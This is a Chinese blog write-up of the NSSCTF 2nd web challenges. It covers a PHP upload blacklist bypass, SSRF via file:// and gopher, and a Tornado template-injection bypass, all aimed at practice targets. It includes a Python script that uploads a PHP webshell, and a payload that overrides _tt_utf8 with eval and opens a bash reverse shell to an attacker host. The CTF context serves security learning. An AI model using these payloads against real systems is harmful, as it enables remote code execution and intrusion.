[NSSCTF 2nd] web复现

于 2024-03-02 20:51:56 发布
阅读量1.0k 收藏 18
点赞数 23
分类专栏: CTF 文章标签: WEB CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136420229
版权

 1.php签到

 <?php

function waf($filename){
    $black_list = array("ph", "htaccess", "ini");
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    foreach ($black_list as $value) {
        if (stristr($ext, $value)){
            return false;
        }
    }
    return true;
}

if(isset($_FILES['file'])){
    $filename = urldecode($_FILES['file']['name']);
    $content = file_get_contents($_FILES['file']['tmp_name']);
    if(waf($filename)){
        file_put_contents($filename, $content);
    } else {
        echo "Please re-upload";
    }
} else{
    highlight_file(__FILE__);
}

上传文件名被黑名单ph,htaccess,ini检测,但是pathinfo检测到filename.extension/.时,PATHINFO_EXTENSION被检测为空,空不在黑名单里面,就能绕过检测

上传一个1.php/.,在file_put_contents函数中,如果filename为1.php/.,就会在当前目录创建一个名为1.php的文件,从而实现传马

由于没有上传点,用py上传

import requests
url="http://node5.anna.nssctf.cn:28680/"
filename="test.php%2f."
content="<?php system($_GET[1]);?>"
file={"file":(filename,content)}
re=requests.post(url=url,files=file)
print(re.text)

/要用url编码

在环境变量里面找到flag

2.Mybox

直接url=file:///proc/1/environ拿到flag

3.MyBox(revenge)

下载源码

url=file:///app/app.py

from flask
import Flask, request, redirect
import requests, socket, struct from urllib
import parse app = Flask(__name__) 
@app.route('/') 
def index(): 
    if not request.args.get('url'): 
        return redirect('/?url=dosth') 
    url = request.args.get('url') 
    if url.startswith('file://'): 
        with open(url[7: ], 'r') as f: 
            return f.read() 
    elif url.startswith('http://localhost/'): 
        return requests.get(url).text 
    elif url.startswith('mybox://127.0.0.1:'): 
        port, content = url[18: ].split('/_', maxsplit = 1) 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        s.settimeout(5) s.connect(('127.0.0.1', int(port))) 
        s.send(parse.unquote(content).encode()) 
        res = b ''
while 1: 
    data = s.recv(1024) 
    if data: 
        res += data
    else: 
        break 
    return res
return ''
app.run('0.0.0.0', 827)

如果以file://开头,则返回后面的文件内容

如果以http://localhost/开头,则发送一个get请求,获取url内容

如果以mybox://127.0.0.1:开头,后面的内容/_左边为端口,右边为内容,建立一个socket连接发送解码后的内容,这个mybox其实就是魔改的gophar

用脚本生成一个gophar请求

import urllib.parse
test =\
"""GET /flag.php HTTP/1.1
Host: 127.0.0.1:80"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
print(result)

因为是get请求,二次url编码,可能环境有问题,我的gophar打不通,后面就是利用2.4.49的apache的RCE漏洞 CVE-2021-41773反弹shell拿到flag

4.MyHurricane

打开是乱的py源码

整理一下

import tornado.ioloop
import tornado.web
import os

BASE_DIR = os.path.dirname(__file__)

def waf(data):
    # Web Application Firewall (WAF) function to filter out certain patterns
    bl = ['\'', '"', '__', '(', ')', 'or', 'and', 'not', '{{', '}}']
    for c in bl:
        if c in data:
            return False

    for chunk in data.split():
        for c in chunk:
            if not (31 < ord(c) < 128):
                return False

    return True

class IndexHandler(tornado.web.RequestHandler):
    def get(self):
        # Handle GET requests, read and display the content of the current file
        with open(__file__, 'r') as f:
            self.finish(f.read())

    def post(self):
        # Handle POST requests, perform WAF check, and write to HTML file if valid
        data = self.get_argument("ssti")
        if waf(data):
            with open('1.html', 'w') as f:
                f.write(f"""<html><body>{data}</body></html>""")
            f.flush()
            self.render('1.html')  # Render the created HTML file
        else:
            self.finish('no no no')  # Reject request if WAF check fails

if __name__ == "__main__":
    # Initialize Tornado web application
    app = tornado.web.Application([
        (r"/", IndexHandler),
    ], compiled_template_cache=

是一个Tornado框架

WAF过滤一些ssti用到的符号

参数是ssti,post提交,由于过滤了{{ 和}},可以使用{% %}

搜索相关bypass发现include不需要括号可以包含文件

包含/proc/1/environ得到flag

但这是非预期解

预期解:

利用_tt_utf8进行变量覆盖绕过

tornado在渲染时会执行_tt_utf8(_tt_tmp),将_tt_utf8变量定义为eval,_tt_tmp从post传参,那么就能执行命令,这里抄用其他师傅的payload

{% set _tt_utf8=eval %}{% raw request.body_arguments[request.method][0] %}&shell=__import__('os').popen("bash -c 'bash -i >%26 /dev/tcp/vps-ip/port <%261'")

在环境变量里面找到flag

tao0845
关注
  • 23
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Flask Web Development 2nd edition
09-25
Flask web development, second edition, python web development
Flask Web Development, 2nd Edition
09-08
Take full creative control of your web applications with Flask, the Python-based microframework. With the second edition of this hands-on book, you’ll learn the framework from the ground up by ...
[NSSCTF Round #15&NSSCTF 2nd]——Web、Misc、Crypto方向 详细Writeup
Leaf_initial的博客
09-02 2323
前言 虽然师傅们已经尽力了,但是没拿到前十有点可惜,题很好吃,明年再来() 关于wp: 因为我没有学过misc,但是比赛的时候还是运气好出了三道,所以wp就只把做题步骤给出,也解释不出原理而且也没有复现完(),感兴趣的师傅可以看看 逆向师傅懒得写wp,轻点骂,密码wp出自队里的密码爷了,我不会() Web php签到 源码如下 <?php function waf($filename){ $black_list = array("ph", "htaccess", "ini");
NSSCTF之Misc篇刷题记录⑩
Aluxian_的博客
05-11 1395
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到题 [羊城杯 2022]签个到
BJDCTF 2nd WEB
A_dmin的博客
03-24 6174
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
NSSCTF2022部分WP
y2xsec的博客
11-02 570
NSSCTF部分题解
Web Scraping with Python, 2nd Edition 免积分下载
qq_37606925的博客
12-08 986
图书说明: 如果编程是神奇的,那么网页抓取肯定是一种魔法。通过编写一个简单的自动程序,您可以查询Web服务器,请求数据并解析它以提取您需要的信息。这本实用书的扩展版不仅向您介绍了网络抓取,还提供了从现代网络中抓取几乎所有类型数据的综合指南。 第一部分重点介绍Web抓取机制:使用Python从Web服务器请求信息,执行服务器响应的基本处理,以及以自动方式与站点交互。第二部分探讨了各种更具体的...
BJDCTF2nd webWP
BLlll的博客
03-23 1万+
BJDCTF2nd webWPfake googleold-hackduangShell假猪套天下第一简单注入xss之光Schrödingerelementmaster文件探测EasyAspDotNet fake google 考点:SSTI模板注入 验证漏洞 {{2*2}} 返回内容4,可确定是ssti,直接读取根目录下的flag pyload: {% for c in [].__clas...
[BJDCTF 2nd] WEB 简单题汇总
SopRomeo的博客
03-26 2972
Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述 经过测试,存在xss和模板注入,这题是模板注入 [参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三:[BJDCTF 2nd]Schrödinger[BJDC...
2nd的计算机软件,2nd在计算器中是什么意思
weixin_29175469的博客
07-15 9566
计算器2nd的意思:第二功能键,全称Second Function (第二功能),相当于电脑上的shift (上档键),如:反正弦在科学计算器上的输入方法(按shift 或2nd F再按sin再输入函数值)。2ndF是用来调用按键的第二功能的,如有些计算器的x^2和√x是一个键,如不先按下2ndF这个键,则这个键的功能是计算平方,而若先按下2ndF,则再按这个键则计算根号。有些计算器上第二选择键不...
BUUCTF_web部分题解
热门推荐
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
effective web design 2nd
05-19
有效设计Web 的第二版 ,有利于提供工作效率的可维护性。 这个是英文原版!
Flask Web Development 2nd Edition(2018版).Pdf
09-04
基于Python的最新web开发框架,轻量级,全方位为你提供web开发指导: Flask Web Development Developing Web Applications with Python
###对华为OD分布式操作系统的详细介绍
05-22
华为OD
2110220116吴骏博.py
最新发布
05-22
2110220116吴骏博.py
基于Java的ApplicationPower快速项目生成脚手架设计源码
05-22
ApplicationPower项目生成脚手架设计源码:该项目基于Java开发,包含284个文件,主要使用Java和Shell语言。ApplicationPower是一个快速的项目生成脚手架,旨在帮助开发者快速搭建项目框架,包括创建项目结构、配置文件、开发环境等,提高开发效率。
基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
基于MATLAB实现的imu和视觉里程计 kalman滤波器 进行融合+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的imu和视觉里程计 kalman滤波器 进行融合+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值